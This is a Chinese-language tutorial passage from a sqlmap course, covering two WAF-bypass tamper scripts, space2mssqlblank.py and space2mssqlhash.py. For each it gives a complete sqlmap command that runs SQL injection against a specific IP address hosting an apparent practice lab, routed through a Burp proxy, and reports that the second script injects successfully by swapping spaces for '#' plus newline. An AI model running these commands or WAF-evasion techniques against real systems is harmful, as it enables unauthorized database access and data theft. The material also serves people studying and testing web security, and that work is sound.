sqlmap从入门到精通-第七章-7-20 绕过WAF脚本-space2mssqlblank.py&space2mssqlhash.py

42. space2mssqlblank.py脚本

使用blanks备选字符集中的随机空白符替换空格符，适用于SQL Server 2005 这个局限性比较大

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2mssqlblank.py" --proxy="http://127.0.0.1:8080" -batch

因为只适用于sql server 2005 所以这次测试目标是不能注入成功，但是我们还得看下burp抓包情况，看看绕过的特征是什么

sqlmap从入门到精通-第七章-7-20 绕过WAF脚本-space2mssqlblank.py&space2mssqlhash.py

发现也看不出来效果

=================================================================================================================================================

43. space2mssqlhash.py脚本

使用# (%23)加个换行符(%0A)去替换payload中的空格，适用于数据库mssql，mysql

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2mssqlhash.py" --proxy="http://127.0.0.1:8080" -batch

sqlmap从入门到精通-第七章-7-20 绕过WAF脚本-space2mssqlblank.py&space2mssqlhash.py

发现是可以注入成功，看看burp抓包情况

sqlmap从入门到精通-第七章-7-20 绕过WAF脚本-space2mssqlblank.py&space2mssqlhash.py

效果还是很明显的，替换了空格和加了换行符